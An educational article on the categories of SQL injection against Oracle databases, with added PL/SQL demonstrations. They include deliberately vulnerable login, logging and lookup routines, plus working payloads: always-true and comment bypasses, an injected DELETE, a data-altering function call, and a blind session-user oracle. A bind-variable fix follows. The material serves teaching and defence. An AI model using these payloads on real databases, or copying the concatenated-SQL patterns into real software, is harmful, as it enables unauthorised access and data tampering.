SQL injection categories


SQL injection attacks are simple in nature: an attacker passes string input to an application in the hope of manipulating the SQL statement the application builds from it.  The difficulty for the attacker is that the statement being exploited is usually unknown.  Open-source applications, and commercial applications delivered with source code, are easier targets because the attacker can find potentially vulnerable statements before the attack.


CATEGORIES OF SQL INJECTION ATTACKS

There are four main categories of SQL Injection attacks against Oracle databases –

1.  SQL Manipulation
2.  Code Injection
3.  Function Call Injection
4.  Buffer Overflows

The first two categories, SQL manipulation and code injection, should be well known to the reader, as
these are the most commonly described attacks for all types of databases (including SQL Server,
MySQL, PostgreSQL, and Oracle).

SQL manipulation typically means modifying the SQL statement through set operations (e.g.,
UNION) or altering the WHERE clause so that it returns a different result.  Many documented SQL injection
attacks are of this type.  The best-known example modifies the WHERE clause of the user
authentication statement so that it always evaluates to TRUE.
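The WHERE-clause manipulation just described, as an added PL/SQL example that is not part of the original article. The table APP_USERS, its two rows and the function LOGIN_VULN are constructed for the demonstration; the only thing that matters is that the function builds its statement by string concatenation.

```sql
-- Added example, not from the original article. APP_USERS, its rows and
-- LOGIN_VULN are constructed for the demonstration (plaintext passwords only
-- to keep the table small).
SET SERVEROUTPUT ON

CREATE TABLE app_users (
  username VARCHAR2(30) PRIMARY KEY,
  password VARCHAR2(30),
  is_admin CHAR(1)
);
INSERT INTO app_users VALUES ('alice', 's3cret',  'Y');
INSERT INTO app_users VALUES ('bob',   'hunter2', 'N');
COMMIT;

-- Vulnerable: p_user and p_pass are spliced straight into the statement text,
-- so the caller controls the shape of the WHERE clause, not just its values.
CREATE OR REPLACE FUNCTION login_vuln (p_user IN VARCHAR2, p_pass IN VARCHAR2)
  RETURN NUMBER
IS
  v_sql VARCHAR2(4000);
  v_cnt NUMBER;
BEGIN
  v_sql := 'SELECT COUNT(*) FROM app_users WHERE username = ''' || p_user ||
           ''' AND password = ''' || p_pass || '''';
  DBMS_OUTPUT.PUT_LINE('Executing: ' || v_sql);
  EXECUTE IMMEDIATE v_sql INTO v_cnt;
  RETURN v_cnt;   -- the caller treats a count > 0 as "authenticated"
END;
/

BEGIN
  -- Normal use with a wrong password: no rows match.
  DBMS_OUTPUT.PUT_LINE('wrong password -> ' || login_vuln('alice', 'guess'));

  -- WHERE-clause manipulation. The password input closes the literal and
  -- appends an always-true disjunct, giving
  --   ... WHERE username = 'alice' AND password = '' OR '1'='1
  -- which matches every row, so the count is 2 and the login succeeds.
  DBMS_OUTPUT.PUT_LINE('OR 1=1 -> ' || login_vuln('alice', q'{' OR '1'='1}'));

  -- Comment injection. "--" discards the rest of the statement, including the
  -- password check, so any known username logs in with no password at all.
  DBMS_OUTPUT.PUT_LINE('comment -> ' || login_vuln(q'{alice' --}', 'anything'));
END;
/
```

The "Executing:" lines printed by the function show the statement Oracle actually parses for each call; reading them is the quickest way to see why the count changes from 0 to 2 to 1. A UNION-based manipulation would target the same concatenation point but needs a statement that returns rows rather than a single count.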

Code injection is when an attacker inserts new SQL statements or database commands into the vulnerable
SQL statement.  The classic code injection attack appends a SQL Server EXECUTE command to the
vulnerable statement.  Code injection only works when the database accepts multiple SQL statements per
request.  SQL Server and PostgreSQL do; Oracle executes one statement per call, so with Oracle it is only
sometimes possible to inject additional statements.  Oracle code injection vulnerabilities involve PL/SQL
code that dynamically builds and executes SQL or an anonymous PL/SQL block (for example with EXECUTE
IMMEDIATE), since a PL/SQL block can contain any number of statements.
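The Oracle variant, as an added example that is not part of the original article: a PL/SQL procedure that builds an anonymous block from caller input and executes it dynamically. The table AUDIT_LOG and the procedures LOG_EVENT and RUN_LOGGER are constructed for the demonstration.

```sql
-- Added example, not from the original article. AUDIT_LOG, LOG_EVENT and
-- RUN_LOGGER are constructed for the demonstration.
CREATE TABLE audit_log (
  entry     VARCHAR2(200),
  logged_at DATE DEFAULT SYSDATE
);

CREATE OR REPLACE PROCEDURE log_event (p_msg IN VARCHAR2) IS
BEGIN
  INSERT INTO audit_log (entry) VALUES (p_msg);
END;
/

-- Vulnerable: the caller's text is spliced into an anonymous PL/SQL block that
-- is then executed. EXECUTE IMMEDIATE runs one unit of work, but that unit is
-- a block, and a block may contain any number of statements.
CREATE OR REPLACE PROCEDURE run_logger (p_msg IN VARCHAR2) IS
  v_plsql VARCHAR2(4000);
BEGIN
  v_plsql := 'BEGIN log_event(''' || p_msg || '''); END;';
  EXECUTE IMMEDIATE v_plsql;
END;
/

BEGIN
  -- Normal use: one row is written to AUDIT_LOG.
  run_logger('login ok');

  -- Injected input closes the string literal and the call, adds a second
  -- statement, closes the block, and comments out the original tail. The
  -- block Oracle executes is:
  --   BEGIN log_event('x'); DELETE FROM audit_log; END; --'); END;
  run_logger(q'{x'); DELETE FROM audit_log; END; --}');
END;
/

-- 0: both the 'login ok' row and the 'x' row were removed by the injected DELETE.
SELECT COUNT(*) AS rows_left FROM audit_log;
```

The same splice works with DBMS_SQL or with a dynamically built SQL string that a PL/SQL routine later wraps in BEGIN ... END; the precondition in every case is that user input reaches the text of a block, not merely the text of a single SQL statement.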

The last two categories are more specific attacks against Oracle databases and are not well known or
documented.  In the vast majority of our application audits, we have found applications vulnerable to
these two types of attacks.

Function call injection is the insertion of Oracle database functions or custom functions into a
vulnerable SQL statement.  These function calls can be used to make operating system calls or
manipulate data in the database.
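Function call injection against a read-only lookup, as an added example that is not part of the original article. The table PRODUCTS, the vulnerable lookup PRODUCT_PRICE and the attacker-supplied function SET_PRICE are constructed for the demonstration; the built-in used for the inference step is SYS_CONTEXT, which exists in every Oracle database. Operating system calls are not shown, since they would need network or file access outside the database.

```sql
-- Added example, not from the original article. PRODUCTS, PRODUCT_PRICE and
-- SET_PRICE are constructed for the demonstration.
SET SERVEROUTPUT ON

CREATE TABLE products (sku VARCHAR2(20) PRIMARY KEY, name VARCHAR2(50), price NUMBER);
INSERT INTO products VALUES ('A1', 'Widget', 10);
INSERT INTO products VALUES ('B2', 'Gadget', 25);
COMMIT;

-- Vulnerable lookup: p_sku goes straight into the WHERE clause of a SELECT.
CREATE OR REPLACE FUNCTION product_price (p_sku IN VARCHAR2) RETURN NUMBER IS
  v_price NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT price FROM products WHERE sku = ''' || p_sku || ''''
    INTO v_price;
  RETURN v_price;
END;
/

-- A function the attacker can create, or finds already present in the schema.
-- Plain DML inside a function called from a SELECT raises ORA-14551;
-- PRAGMA AUTONOMOUS_TRANSACTION lets the function update and commit anyway.
CREATE OR REPLACE FUNCTION set_price (p_sku IN VARCHAR2, p_price IN NUMBER)
  RETURN NUMBER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  UPDATE products SET price = p_price WHERE sku = p_sku;
  COMMIT;
  RETURN 1;
END;
/

DECLARE
  v NUMBER;
BEGIN
  -- Normal use.
  DBMS_OUTPUT.PUT_LINE('A1 costs ' || product_price('A1'));        -- 10

  -- Custom function injection. The statement becomes
  --   SELECT price FROM products WHERE sku = 'A1' AND set_price('B2', 0) = 1 AND sku = 'A1'
  -- It still returns A1's price, but evaluating the predicate ran SET_PRICE,
  -- which changed and committed B2's price from inside a read-only lookup.
  v := product_price(q'{A1' AND set_price('B2', 0) = 1 AND sku = 'A1}');
  DBMS_OUTPUT.PUT_LINE('A1 still costs ' || v);                    -- 10
  SELECT price INTO v FROM products WHERE sku = 'B2';
  DBMS_OUTPUT.PUT_LINE('B2 now costs ' || v);                      -- 0

  -- Built-in function injection used as a yes/no oracle: the row is returned
  -- only if the guess about the session user is right, otherwise the lookup
  -- raises NO_DATA_FOUND. Repeating this per character extracts the value.
  BEGIN
    v := product_price(q'{A1' AND SUBSTR(SYS_CONTEXT('USERENV','SESSION_USER'),1,1) = 'S' AND sku = 'A1}');
    DBMS_OUTPUT.PUT_LINE('session user starts with S');
  EXCEPTION
    WHEN NO_DATA_FOUND THEN
      DBMS_OUTPUT.PUT_LINE('session user does not start with S');
  END;
END;
/
```

Note that neither payload needs a second statement or a comment marker: the injected text keeps the quotes balanced, so it survives the single-statement restriction that defeats code injection on Oracle. Any function the executing user can call, built-in or custom, is reachable this way.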

Buffer overflow injection is a subset of function call injection.  In several commercial and
open-source databases, a few database functions contain vulnerabilities that can result in a buffer
overflow, and an attacker who can inject a function call can reach them from any vulnerable SQL
statement.  Patches are available for most of these vulnerabilities, but many production databases
remain unpatched.

WHAT’S VULNERABLE

An application is vulnerable to SQL injection for only one reason: end-user string input is passed into
a dynamically built SQL statement without proper validation.  Usually the string is passed directly to
the statement.  However, the input may instead be stored in the database and later concatenated into a
dynamic SQL statement; this is referred to as second-order SQL injection.  Because many web applications
are stateless, it is common to write data to the database, or store it by some other means, between
pages, and any such stored value is a second-order candidate.  This indirect type of attack is much more
complex and usually requires in-depth knowledge of the application.

WHAT’S NOT VULNERABLE

SQL statements that use bind variables are generally protected from SQL injection: the Oracle
database uses the value of the bind variable exclusively as data and never interprets its contents as
part of the statement.  PL/SQL (static SQL, and EXECUTE IMMEDIATE with a USING clause) and JDBC
(PreparedStatement) both support bind variables.  Bind variables should be used extensively, for both
security and performance reasons, since a bound statement is parsed once and its cursor reused.
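A login check of the concatenated kind described under SQL manipulation above, rewritten with bind variables, as an added example that is not part of the original article. The table ACCOUNTS, its rows and the functions LOGIN_BIND and LOGIN_STATIC are constructed for the demonstration; the payloads are the same ones that break a concatenated version.

```sql
-- Added example, not from the original article. ACCOUNTS, LOGIN_BIND and
-- LOGIN_STATIC are constructed for the demonstration.
SET SERVEROUTPUT ON

CREATE TABLE accounts (username VARCHAR2(30) PRIMARY KEY, password VARCHAR2(30));
INSERT INTO accounts VALUES ('alice', 's3cret');
INSERT INTO accounts VALUES ('bob',   'hunter2');
COMMIT;

-- Dynamic SQL with bind variables: :u and :p are placeholders, the statement
-- text never changes, and the values travel separately through USING, so
-- nothing the caller sends can alter the parse tree.
CREATE OR REPLACE FUNCTION login_bind (p_user IN VARCHAR2, p_pass IN VARCHAR2)
  RETURN NUMBER
IS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM accounts WHERE username = :u AND password = :p'
    INTO v_cnt USING p_user, p_pass;
  RETURN v_cnt;
END;
/

-- Static SQL inside PL/SQL binds its variables automatically and is the
-- preferable form whenever the statement is known at compile time.
CREATE OR REPLACE FUNCTION login_static (p_user IN VARCHAR2, p_pass IN VARCHAR2)
  RETURN NUMBER
IS
  v_cnt NUMBER;
BEGIN
  SELECT COUNT(*) INTO v_cnt
    FROM accounts
   WHERE username = p_user AND password = p_pass;
  RETURN v_cnt;
END;
/

BEGIN
  DBMS_OUTPUT.PUT_LINE('valid       -> ' || login_bind('alice', 's3cret'));          -- 1
  -- The classic payload is now just a password value that matches nobody.
  DBMS_OUTPUT.PUT_LINE('OR 1=1      -> ' || login_bind('alice', q'{' OR '1'='1}'));  -- 0
  -- The comment payload is a username value that matches nobody.
  DBMS_OUTPUT.PUT_LINE('comment     -> ' || login_bind(q'{alice' --}', 'x'));        -- 0
  DBMS_OUTPUT.PUT_LINE('static form -> ' || login_static('alice', q'{' OR '1'='1}')); -- 0
END;
/
```

Bind variables only cover values. Identifiers such as table names, column names in an ORDER BY, or schema names cannot be bound; where those must come from the caller, validate them against a fixed allow-list or pass them through DBMS_ASSERT (for example DBMS_ASSERT.SIMPLE_SQL_NAME) before concatenating them, since those positions remain concatenation points and therefore remain injection points.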

Also see: What is SQL injection?
